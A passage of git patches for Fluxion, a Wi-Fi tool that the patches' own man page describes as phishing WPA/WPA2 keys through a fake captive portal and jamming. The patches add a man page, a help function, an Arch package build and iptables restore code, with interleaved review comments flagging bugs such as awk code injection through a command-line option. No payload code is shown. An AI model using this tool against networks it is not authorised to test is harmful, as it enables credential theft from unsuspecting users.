$NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+$SCREEN_SIZE_MID_X-0" @@ -542,7 +545,7 @@ fluxion_do_sequence() { if [ ${#@} -ne 2 ]; then return -1; fi # TODO: Implement an alternative, better method of doing - # what this subroutine does, maybe using for-loop iteration. + # what this subroutine does, maybe using for-loop iteFLUXIONWindowRation. # The for-loop implementation must support the subroutines # defined above, including updating the namespace tracker. @@ -618,8 +621,8 @@ fluxion_header() { fluxion_unset_language() { FluxionLanguage="" - if [ "$FLUXIONPreferencesFile" ]; then - sed -i.backup "/FluxionLanguage=.\+/ d" "$FLUXIONPreferencesFile" + if [ "$FLUXIONLanguagePreferencesFile" ]; then + sed -i.backup "/FluxionLanguage=.\+/ d" "$FLUXIONLanguagePreferencesFile" fi } @@ -661,13 +664,13 @@ fluxion_set_language() { source "$FLUXIONPath/language/$FluxionLanguage.sh" - if [ "$FLUXIONPreferencesFile" ]; then - if more $FLUXIONPreferencesFile | \ + if [ "$FLUXIONLanguagePreferencesFile" ]; then + if more $FLUXIONLanguagePreferencesFile | \ grep -q "FluxionLanguage=.\+" &> /dev/null; then sed -r "s/FluxionLanguage=.+/FluxionLanguage=$FluxionLanguage/g" \ - -i.backup "$FLUXIONPreferencesFile" + -i.backup "$FLUXIONLanguagePreferencesFile" else - echo "FluxionLanguage=$FluxionLanguage" >> "$FLUXIONPreferencesFile" + echo "FluxionLanguage=$FluxionLanguage" >> "$FLUXIONLanguagePreferencesFile" fi fi } @@ -1013,7 +1016,7 @@ fluxion_target_get_candidates() { return 3 fi - # Syntheize scan operation results from output file "dump-01.csv." + # Syntheize scan opeFLUXIONWindowRation results from output file "dump-01.csv." echo -e "$FLUXIONVLine $FLUXIONPreparingScannerResultsNotice" # WARNING: The code below may break with different version of airmon-ng. # The times matching operator "{n}" isn't supported by mawk (alias awk). diff --git a/preferences/.gitkeep b/preferences/.gitkeep new file mode 100644 index 0000000..e69de29 
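Review bot: fluxion_set_resolution now splices `$FLUXIONWindowRatio`, which `--ratio` sets from the command line, directly into awk program text, as in `awk "BEGIN {print $SCREEN_SIZE_X/$FLUXIONWindowRatio}"`. A zero or non-numeric value makes awk fail or yields a broken geometry, and any other text in the value is parsed as awk code in a script that runs as root. Pass the numbers as data instead, `awk -v x="$SCREEN_SIZE_X" -v r="$FLUXIONWindowRatio" 'BEGIN {print int(x/r)}'`, which also makes the `echo … /1 | bc` step unnecessary. In the geometry strings kept as context, `$NEW_SCREEN_SIZE_Xx` expands an unset variable named `NEW_SCREEN_SIZE_Xx`; they need `${NEW_SCREEN_SIZE_X}x$NEW_SCREEN_SIZE_Y`. The function body continues past the hunk.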
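Review bot: Two comments were damaged, apparently by the RATIO rename: `for-loop iteFLUXIONWindowRation` in fluxion_do_sequence (hunk at -542) and `scan opeFLUXIONWindowRation results` in fluxion_target_get_candidates (hunk at -1013). They should read `# what this subroutine does, maybe using for-loop iteration.` and `# Synthesize scan operation results from output file "dump-01.csv."`. Nothing else changes in those two hunks.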
From 488818edc4cd4053e0f0df1e87affa97654e5c80 Mon Sep 17 00:00:00 2001 From: Erik Dubois Date: Wed, 31 Jan 2018 14:57:43 +0100 Subject: [PATCH 40/45] Add man page --- docs/man/fluxion.man | 60 ++++++++++++++++++++++++++++++++++++++++++++ fluxion | 10 +++++--- 2 files changed, 67 insertions(+), 3 deletions(-) create mode 100644 docs/man/fluxion.man diff --git a/docs/man/fluxion.man b/docs/man/fluxion.man new file mode 100644 index 0000000..29e624b --- /dev/null +++ b/docs/man/fluxion.man 
@@ -0,0 +1,60 @@ +FLUXION(1) User Manuals FLUXION(1) + + +NAME + fluxion - Fluxion is a security auditing and social-engineering + research tool + +SYNOPSIS + fluxion + fluxion -a [attack] -e [essid] -b [bssid] -- -j ... + +DESCRIPTION + Fluxion is a security auditing and social-engineering research tool. + It is a remake of linset by vk496 with (hopefully) less bugs + and more functionality. The script attempts to retrieve the WPA/WPA2 + key from a target access point by means of a social engineering + (phising) attack. It's compatible with the latest release of Kali + (rolling). Fluxion's attacks' setup is mostly manual, + but experimental auto-mode handles some of the attacks' + setup parameters. + +OPTIONS + -a : Give a certain attack + -e : Give a certain essid + -b : Give a certain bssid + -- : Marker is required + -j : Give a certain jamming interface + -a : Give a certain access point interface + -x : Use xterm instead of tmux + -v : Print version number + -d : Run fluxion in debug mode + -k : Kill wireless connection if it is connected + -m : Run fluxion in manual mode instead of auto + -l : Give a certain language + --help : Print help page + + ./fluxion -a [ATTACK] -e [ESSID] -b [BSSID] -c [CHANNEL] \ + -- -a [AP INTERFACE] -j [JAMMING INTERFACE] + +FILES + $HOME/fluxion/attack/* + /tmp/fluxspace/* + +.DIAGNOSTICS + The following diagnostics may be issued on stderr: + + Please checkout the other log files for more details or check + debug mode. + +BUGS + Please report any bugs at: + https://github.com/FluxionNetwork/fluxion/issues + +AUTHOR + Cyberfee, l3op, dlinkproto, vk496, MPX4132 + +SEE ALSO + aircrack-ng(8) + +Linux Last change: MARCH 2018 2 diff --git a/fluxion b/fluxion index 72594ff..9e24cf2 100755 --- a/fluxion +++ b/fluxion 
@@ -27,6 +27,9 @@ readonly FLUXIONRevision=2 # Declare window ration bigger = smaller windows FLUXIONWindowRatio=4 +# Print help if it is true +FluxionHelpTrue=false + # ============================================================ # # ================= < Script Sanity Checks > ================= # @@ -73,16 +76,16 @@ source lib/FormatUtils.sh source lib/ColorUtils.sh source lib/IOUtils.sh source lib/HashUtils.sh +source lib/Help.sh # NOTE: These are configured after arguments are loaded (later). - # ============================================================ # # =================== < Parse Parameters > =================== # # ============================================================ # if ! FLUXIONCLIArguments=$( - getopt --options="vdkrnmtb:e:c:l:a:" \ - --longoptions="debug,version,killer,reloader,ratio,airmon-ng,multiplexer,target,test,bssid:,essid:,channel:,language:,attack:" \ + getopt --options="vdkrnmtbh:e:c:l:a:h:r" \ + --longoptions="debug,version,killer,reloader,ratio,help,airmon-ng,multiplexer,target,test,bssid:,essid:,channel:,language:,attack:" \ --name="FLUXION V$FLUXIONVersion.$FLUXIONRevision" -- "$@" ); then echo -e "${CRed}Aborted$CClr, parameter error detected..."; exit 5 @@ -104,6 +107,7 @@ eval set -- "$FLUXIONCLIArguments" # Set environment parameters. while [ "$1" != "" -a "$1" != "--" ]; do case "$1" in -v|--version) echo "FLUXION V$FLUXIONVersion.$FLUXIONRevision"; exit;; + -h|--help) fluxion_help; exit;; -d|--debug) readonly FLUXIONDebug=1;; -k|--killer) readonly FLUXIONWIKillProcesses=1;; -r|--reloader) readonly FLUXIONWIReloadDriver=1;; From b8e948039d797a653bcb9e7cebe23f637cb4edb1 Mon Sep 17 00:00:00 2001 From: Erik Dubois Date: Wed, 31 Jan 2018 18:28:38 +0100 Subject: [PATCH 41/45] Minor man page tweaks --- docs/man/fluxion.1 | 76 ++++++++++++++++++++++++++++++ docs/man/fluxion.man | 110 ++++++++++++++++++++++++++++--------------- 2 files changed, 147 insertions(+), 39 deletions(-) create mode 100644 docs/man/fluxion.1 
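Review bot: The new short-option string `vdkrnmtbh:e:c:l:a:h:r` (hunk at -73) moves the colon away from `b`. As a result `-b` no longer takes an argument, although its arm from the previous patch reads `FluxionTargetMAC=$2; shift`, and `-h` now demands one, although the added arm is `-h|--help) fluxion_help; exit;;`. `h:` and `r` are also listed twice. `--options="vdkrnmthb:e:c:l:a:"` keeps `-b` as it was and adds `-h` as a plain flag. `lib/Help.sh`, sourced in the same hunk, is not in this commit's diffstat, so it is worth confirming that fluxion_help exists at this point in the series.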
diff --git a/docs/man/fluxion.1 b/docs/man/fluxion.1
new file mode 100644
index 0000000..bdd5454
--- /dev/null
+++ b/docs/man/fluxion.1
@@ -0,0 +1,76 @@ +.TH FLUXION 1 "MARCH 2018" Linux "User Manuals" +.SH NAME +fluxion \- Fluxion is a security auditing and social-engineering research tool +.SH SYNOPSIS +.B fluxion [-debug] [-l +.I language +.B ] +.I attack +.B ... +.SH DESCRIPTION +.B fluxion is a security auditing and social-engineering research tool. +It is a remake of linset by vk496 with (hopefully) less bugs +and more functionality. The script attempts to retrieve the WPA/WPA2 +key from a target access point by means of a social engineering +(phising) attack. It's compatible with the latest release of Kali +(rolling). Fluxion's attacks' setup is mostly manual, +but experimental auto-mode handles some of the attacks' +setup parameters. +.SH OPTIONS +.IP "-v " +Print version number. +.IP "--help " +Print help page and exit with 0. +.IP "-m " +Run fluxion in manual mode instead of auto mode. +.IP "-k " +Kill wireless connection if it is connected. +.IP "-d " +Run fluxion in debug mode. +.IP "-x " +Try to run fluxion with xterm terminals instead of tmux. +.IP "-r " +Reload driver. +.IP "-l " +Define a certain language. +.IP "-e " +Select the target network based on the ESSID. +.IP "-c " +Indicate the channel(s) to listen to. +.IP "-a " +Define a certain attack. +.IP "--ratio " +Define the windows size. Bigger ratio -> smaller window size. +Default is 4. +.IP "-b " +Select the target network based on the access point MAC address. +.IP "-j " +Define a certain jamming interface. +.IP "-a " +Define a certain access point interface. +.SH FILES +.I /tmp/fluxspace/ +.RS +The system wide tmp directory. +.RE +.I $FLUXION/attacks/ +.RS +Folder where handshakes and passwords +are stored in. +.SH ENVIRONMENT +.IP FLUXIONAuto +Automatically run fluxion in auto mode if exported. +.IP FLUXIONDebug +Automatically run fluxion in debug mode if exported. +.IP FLUXIONWIKillProcesses +Automatically kill any interfering process(es). +.SH DIAGNOSTICS +Please checkout the other log files or use +the debug mode. 
+.SH BUGS +Please report any bugs at: +https://github.com/FluxionNetwork/fluxion/issues +.SH AUTHOR +Cyberfee, l3op, dlinkproto, vk496, MPX4132 +.SH "SEE ALSO" +.BR aircrack-ng (8), diff --git a/docs/man/fluxion.man b/docs/man/fluxion.man index 29e624b..65fe62e 100644 --- a/docs/man/fluxion.man +++ b/docs/man/fluxion.man 
@@ -1,60 +1,92 @@ -FLUXION(1) User Manuals FLUXION(1) +FLUXION(1) User Manuals FLUXION(1) + NAME - fluxion - Fluxion is a security auditing and social-engineering - research tool + fluxion - Fluxion is a security auditing and social-engineering + research tool SYNOPSIS - fluxion - fluxion -a [attack] -e [essid] -b [bssid] -- -j ... + fluxion [-debug] [-l language ] attack ... DESCRIPTION - Fluxion is a security auditing and social-engineering research tool. - It is a remake of linset by vk496 with (hopefully) less bugs - and more functionality. The script attempts to retrieve the WPA/WPA2 - key from a target access point by means of a social engineering - (phising) attack. It's compatible with the latest release of Kali - (rolling). Fluxion's attacks' setup is mostly manual, - but experimental auto-mode handles some of the attacks' - setup parameters. + fluxion is a security auditing and social-engineering research tool. + It is a remake of linset by vk496 with (hopefully) less bugs and more + functionality. The script attempts to retrieve the WPA/WPA2 key from a + target access point by means of a social engineering (phising) attack. + It's compatible with the latest release of Kali (rolling). Fluxion's + attacks' setup is mostly manual, but experimental auto-mode handles + some of the attacks' setup parameters. OPTIONS - -a : Give a certain attack - -e : Give a certain essid - -b : Give a certain bssid - -- : Marker is required - -j : Give a certain jamming interface - -a : Give a certain access point interface - -x : Use xterm instead of tmux - -v : Print version number - -d : Run fluxion in debug mode - -k : Kill wireless connection if it is connected - -m : Run fluxion in manual mode instead of auto - -l : Give a certain language - --help : Print help page + -v Print version number. - ./fluxion -a [ATTACK] -e [ESSID] -b [BSSID] -c [CHANNEL] \ - -- -a [AP INTERFACE] -j [JAMMING INTERFACE] + --help Print help page and exit with 0. 
+ + -m Run fluxion in manual mode instead of auto mode. + + -k Kill wireless connection if it is connected. + + -d Run fluxion in debug mode. + + -x Try to run fluxion with xterm terminals instead of tmux. + + -r Reload driver. + + -l + Define a certain language. + + -e + Select the target network based on the ESSID. + + -c + Indicate the channel(s) to listen to. + + -a + Define a certain attack. + + --ratio + Define the windows size. Bigger ratio -> smaller window size. + Default is 4. + + -b + Select the target network based on the access point MAC address. + + -j + Define a certain jamming interface. + + -a + Define a certain access point interface. FILES - $HOME/fluxion/attack/* - /tmp/fluxspace/* + /tmp/fluxspace/ + The system wide tmp directory. + $FLUXION/attacks/ + Folder where handshakes and passwords are stored in. -.DIAGNOSTICS - The following diagnostics may be issued on stderr: +ENVIRONMENT + FLUXIONAuto + Automatically run fluxion in auto mode if exported. - Please checkout the other log files for more details or check - debug mode. + FLUXIONDebug + Automatically run fluxion in debug mode if exported. + + FLUXIONWIKillProcesses + Automatically kill any interfering process(es). + +DIAGNOSTICS + Please checkout the other log files or use the debug mode. BUGS - Please report any bugs at: - https://github.com/FluxionNetwork/fluxion/issues + Please report any bugs at: https://github.com/FluxionNetwork/flux- + ion/issues AUTHOR - Cyberfee, l3op, dlinkproto, vk496, MPX4132 + Cyberfee, l3op, dlinkproto, vk496, MPX4132 SEE ALSO - aircrack-ng(8) + aircrack-ng(8), -Linux Last change: MARCH 2018 2 + + +Linux MARCH 2018 FLUXION(1) \ No newline at end of file From 46a8114a3bbfea4ce369f469e17206fc1b65793d Mon Sep 17 00:00:00 2001 
From: Erik Dubois Date: Thu, 1 Feb 2018 16:22:40 +0100 Subject: [PATCH 42/45] Add build option for arch linux --- attacks/Captive Portal/attack.sh | 5 +-- bin/arch/PKGBUILD | 66 ++++++++++++++++++++++++++++++++ fluxion | 31 +++++++++------ 3 files changed, 88 insertions(+), 14 deletions(-) create mode 100644 bin/arch/PKGBUILD diff --git a/attacks/Captive Portal/attack.sh b/attacks/Captive Portal/attack.sh index 3f8d2ee..b7636dc 100755 --- a/attacks/Captive Portal/attack.sh +++ b/attacks/Captive Portal/attack.sh @@ -1055,10 +1055,9 @@ captive_portal_generic() { } captive_portal_unset_routes() { - if [ -f "$FLUXIONWorkspacePath/iptables-rules" ]; then - iptables-restore <"$FLUXIONWorkspacePath/iptables-rules" \ + if [ -f "$FLUXIONIPTablesBackup" ]; then + iptables-restore <"$FLUXIONIPTablesBackup" \ &> $FLUXIONOutputDevice - sandbox_remove_workfile "$FLUXIONWorkspacePath/iptables-rules" else iptables --flush iptables --table nat --flush diff --git a/bin/arch/PKGBUILD b/bin/arch/PKGBUILD new file mode 100644 index 0000000..3640785 --- /dev/null +++ b/bin/arch/PKGBUILD 
@@ -0,0 +1,66 @@ +# Maintainer: Cyberfee + +_pkgname=fluxion +pkgname=$_pkgname-git +pkgver=r1183.63b821f +pkgrel=1 +pkgdesc='Fluxion is a security auditing and social-engineering research tool' +url='https://github.com/FluxionNetwork/fluxion' +license=('GPL3') +source=('git://github.com/FluxionNetwork/fluxion.git#branch=master') + +depends=( + 'aircrack-ng' 'bash>=4.2' 'coreutils' + 'awk' 'iw' 'unzip' + 'curl' 'bc' 'xterm' +) + +makedepends=('binutils' 'coreutils' 'git') +conflicts=('fluxion-git') +provides=('fluxion-git') +sha256sums=('SKIP') +arch=('any') + +prepare() { + if [ -d "$srcdir/$pkgname" ]; then + rm -rf "$srcdir/$pkgname" + fi + + mkdir -p "$srcdir/$pkgname" + cd "$srcdir/$pkgname" +} + +pkgver() { + cd "$srcdir/$_pkgname" + + ( set -o pipefail + git describe --long 2>/dev/null | sed 's/\([^-]*-g\)/r\1/;s/-/./g' || + printf "r%s.%s" "$(git rev-list --count HEAD)" "$(git rev-parse --short HEAD)" + ) +} + +prepare() { + cd "$srcdir/$_pkgname" +} + +package() { + cd "$srcdir/$_pkgname" + + mkdir -p "$pkgdir/usr/bin" + mkdir -p "$pkgdir/usr/share/fluxion" + + install -Dm644 -t "$pkgdir/usr/share/doc/fluxion/" README.md + install -Dm644 LICENSE "$pkgdir/usr/share/licenses/airgeddon/LICENSE" + + rm -rf *.md .git* *.yml .project .editorconfig + + cp -a --no-preserve=ownership * "$pkgdir/usr/share/fluxion" + + cat > "$pkgdir/usr/bin/fluxion" << EOF +#!/bin/sh +cd /usr/share/fluxion +exec bash fluxion.sh "\${@}" +EOF + + chmod a+x "$pkgdir/usr/bin/fluxion" +} \ No newline at end of file diff --git a/fluxion b/fluxion index 9e24cf2..cf44983 100755 --- a/fluxion +++ b/fluxion 
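Review bot: `source=('git://github.com/FluxionNetwork/fluxion.git#branch=master')` fetches over the unauthenticated git protocol with `sha256sums=('SKIP')`, so nothing verifies the code that gets packaged and later run as root. Use `source=('git+https://github.com/FluxionNetwork/fluxion.git#branch=master')`. The generated wrapper ends in `exec bash fluxion.sh "\${@}"`, but the script in this series is named `fluxion`. The licence is installed under `licenses/airgeddon` rather than the package's own name. `prepare()` is defined twice, so only the second definition, a bare `cd`, takes effect.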
@@ -12,6 +12,7 @@ readonly FLUXIONPath=$(cd "$(dirname "$0")"; pwd -P) # Path to the temp. directory available to FLUXION & subscripts. readonly FLUXIONWorkspacePath="/tmp/fluxspace" +readonly FLUXIONIPTablesBackup="$FLUXIONPath/iptables-rules" # Path to FLUXION's preferences file, to be loaded afterward. readonly FLUXIONLanguagePreferencesFile="$FLUXIONPath/preferences/LanguagePreference.conf" @@ -22,15 +23,11 @@ readonly FLUXIONNoiseFloor=-90 readonly FLUXIONNoiseCeiling=-60 readonly FLUXIONVersion=4 -readonly FLUXIONRevision=2 +readonly FLUXIONRevision=3 # Declare window ration bigger = smaller windows FLUXIONWindowRatio=4 -# Print help if it is true -FluxionHelpTrue=false - - # ============================================================ # # ================= < Script Sanity Checks > ================= # # ============================================================ # @@ -102,8 +99,7 @@ readonly FLUXIONCLIArguments=${FLUXIONCLIArguments%%--*} # ============= < Argument Loaded Configurables > ============ # eval set -- "$FLUXIONCLIArguments" # Set environment parameters. -#[ "$1" != "" ] && readonly FLUXIONAuto=1 # Auto-mode if using CLI. - +[ "$1" != "" ] && readonly FLUXIONAuto=1 # Auto-mode if using CLI. while [ "$1" != "" -a "$1" != "--" ]; do case "$1" in -v|--version) echo "FLUXION V$FLUXIONVersion.$FLUXIONRevision"; exit;; @@ -211,7 +207,7 @@ fluxion_startup() { if [ "$FLUXIONDebug" ]; then return 1; fi # Make sure that we save the iptable files - iptables-save >"$FLUXIONWorkspacePath/iptables-rules" + iptables-save >"$FLUXIONIPTablesBackup" local banner=() format_center_literals \ 
@@ -339,6 +335,17 @@ fluxion_shutdown() { done fi + echo -e "$CWht[$CRed-$CWht] $FLUXIONDisablingCleaningIPTablesNotice$CClr" + if [ -f "$FLUXIONIPTablesBackup" ]; then + iptables-restore <"$FLUXIONIPTablesBackup" \ + &> $FLUXIONOutputDevice + else + iptables --flush + iptables --table nat --flush + iptables --delete-chain + iptables --table nat --delete-chain + fi + echo -e "$CWht[$CRed-$CWht] $FLUXIONRestoringTputNotice$CClr" tput cnorm @@ -352,9 +359,11 @@ fluxion_shutdown() { # TODO: Add support for other network managers (wpa_supplicant?). if [ $(which systemctl) ]; then - service network-manager restart &> $FLUXIONOutputDevice & - service networkmanager restart &> $FLUXIONOutputDevice & - service networking restart &> $FLUXIONOutputDevice & + if [ $(which service) ];then + service network-manager restart &> $FLUXIONOutputDevice & + service networkmanager restart &> $FLUXIONOutputDevice & + service networking restart &> $FLUXIONOutputDevice & + fi else systemctl restart network-manager.service &> $FLUXIONOutputDevice & fi From 70bdc012324f4a07c94338fde33dc704b1ddc35a Mon Sep 17 00:00:00 2001 From: deltax Date: Thu, 1 Feb 2018 16:43:45 +0100 Subject: [PATCH 43/45] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index bbc77e7..fce9a71 100644 --- a/README.md +++ b/README.md 
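Review bot: When no backup file exists, the `else` branch flushes the filter and nat tables and deletes all user chains, which also removes firewall rules the host had before fluxion ran and that fluxion never created. Conversely, the `-f` test accepts a file left behind by an earlier run, since nothing visible removes it after use, so an outdated rule set could be restored over the current one. I would warn and skip the cleanup when there is no backup from this run, and consume the file on success: `iptables-restore <"$FLUXIONIPTablesBackup" &>"$FLUXIONOutputDevice" && rm -f -- "$FLUXIONIPTablesBackup"`. `fluxion_shutdown` starts and ends outside the hunk.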
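Review bot: The outer test in the `@@ -352,9 +359,11 @@` hunk reads as inverted: the `service …` commands run when `which systemctl` succeeds, and `systemctl restart` sits in the `else` that is reached only when systemctl is missing. With the added inner `which service` check, a systemd host without the `service` wrapper now restarts no network manager at all, which likely leaves the machine without networking after shutdown. Writing the outer line as `if ! command -v systemctl >/dev/null 2>&1; then`, and the inner one with `command -v service` likewise, puts each command under the tool it needs and avoids the unquoted `$(which …)`. `fluxion_shutdown` continues outside the hunk.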
@@ -3,6 +3,7 @@ # Fluxion is the future of MITM WPA attacks Fluxion is a security auditing and social-engineering research tool. It is a remake of linset by vk496 with (hopefully) less bugs and more functionality. The script attempts to retrieve the WPA/WPA2 key from a target access point by means of a social engineering (phising) attack. It's compatible with the latest release of Kali (rolling). Fluxion's attacks' setup is mostly manual, but experimental auto-mode handles some of the attacks' setup parameters. Read the [FAQ](https://github.com/FluxionNetwork/fluxion/wiki/FAQ) before requesting issues. +If you need quick help, fluxion is also avaible on gitter. You can talk with us [here](https://gitter.im/FluxionNetwork/Lobby) ## Installation Read [here](https://github.com/FluxionNetwork/fluxion/wiki/Generate-ssh-keys) before you do the following steps.
From 7d024460822a61b7c5d56cab79f6e9c39a17db18 Mon Sep 17 00:00:00 2001 From: Erik Dubois Date: Thu, 1 Feb 2018 16:46:24 +0100 Subject: [PATCH 44/45] Update revision number --- fluxion | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/fluxion b/fluxion index cf44983..7477daa 100755 --- a/fluxion +++ b/fluxion @@ -23,7 +23,7 @@ readonly FLUXIONNoiseFloor=-90 readonly FLUXIONNoiseCeiling=-60 readonly FLUXIONVersion=4 -readonly FLUXIONRevision=3 +readonly FLUXIONRevision=4 # Declare window ration bigger = smaller windows FLUXIONWindowRatio=4 From c54fbdf51a4b2769030f745094749878668643da Mon Sep 17 00:00:00 2001 From: deltax Date: Sat, 3 Feb 2018 11:54:15 +0100 Subject: [PATCH 45/45] Create Help.sh --- lib/Help.sh | 96 +++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 96 insertions(+) create mode 100644 lib/Help.sh diff --git a/lib/Help.sh b/lib/Help.sh new file mode 100644 index 0000000..9ffdb99 --- /dev/null +++ b/lib/Help.sh 
@@ -0,0 +1,96 @@
+#!/bin/bash
+
+function fluxion_help{
+ echo " FLUXION(1) User Manuals FLUXION(1)
+
+
+
+ NAME
+ fluxion - Fluxion is a security auditing and social-engineering
+ research tool
+
+ SYNOPSIS
+ fluxion [-debug] [-l language ] attack ...
+
+ DESCRIPTION
+ fluxion is a security auditing and social-engineering research tool.
+ It is a remake of linset by vk496 with (hopefully) less bugs and more
+ functionality. The script attempts to retrieve the WPA/WPA2 key from a
+ target access point by means of a social engineering (phising) attack.
+ It's compatible with the latest release of Kali (rolling). Fluxion's
+ attacks' setup is mostly manual, but experimental auto-mode handles
+ some of the attacks' setup parameters.
+
+ OPTIONS
+ -v Print version number.
+
+ --help Print help page and exit with 0.
+
+ -m Run fluxion in manual mode instead of auto mode.
+
+ -k Kill wireless connection if it is connected.
+
+ -d Run fluxion in debug mode.
+
+ -x Try to run fluxion with xterm terminals instead of tmux.
+
+ -r Reload driver.
+
+ -l
+ Define a certain language.
+
+ -e
+ Select the target network based on the ESSID.
+
+ -c
+ Indicate the channel(s) to listen to.
+
+ -a
+ Define a certain attack.
+
+ --ratio
+ Define the windows size. Bigger ratio -> smaller window size.
+ Default is 4.
+
+ -b
+ Select the target network based on the access point MAC address.
+
+ -j
+ Define a certain jamming interface.
+
+ -a
+ Define a certain access point interface.
+
+ FILES
+ /tmp/fluxspace/
+ The system wide tmp directory.
+ $FLUXION/attacks/
+ Folder where handshakes and passwords are stored in.
+
+ ENVIRONMENT
+ FLUXIONAuto
+ Automatically run fluxion in auto mode if exported.
+
+ FLUXIONDebug
+ Automatically run fluxion in debug mode if exported.
+
+ FLUXIONWIKillProcesses
+ Automatically kill any interfering process(es).
+
+ DIAGNOSTICS
+ Please checkout the other log files or use the debug mode.
+
+ BUGS
+ Please report any bugs at: https://github.com/FluxionNetwork/flux-
+ ion/issues
+
+ AUTHOR
+ Cyberfee, l3op, dlinkproto, vk496, MPX4132
+
+ SEE ALSO
+ aircrack-ng(8),
+
+
+ Linux MARCH 2018 FLUXION(1)"
+
+}
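Review bot: `function fluxion_help{` is not a valid function header in bash: without a space or `()` before the brace the name is read as `fluxion_help{` and the following `echo` is rejected as a syntax error, so sourcing `lib/Help.sh` would fail; `fluxion_help() {` fixes it. The manual text sits inside a double-quoted `echo`, so `$FLUXION/attacks/` is expanded at run time (to `/attacks/` if `FLUXION` is unset); a quoted here-document, `cat <<'EOF'`, prints it literally. `-a` is documented twice, once for the attack and once for the access point interface, so one of the two letters is presumably wrong.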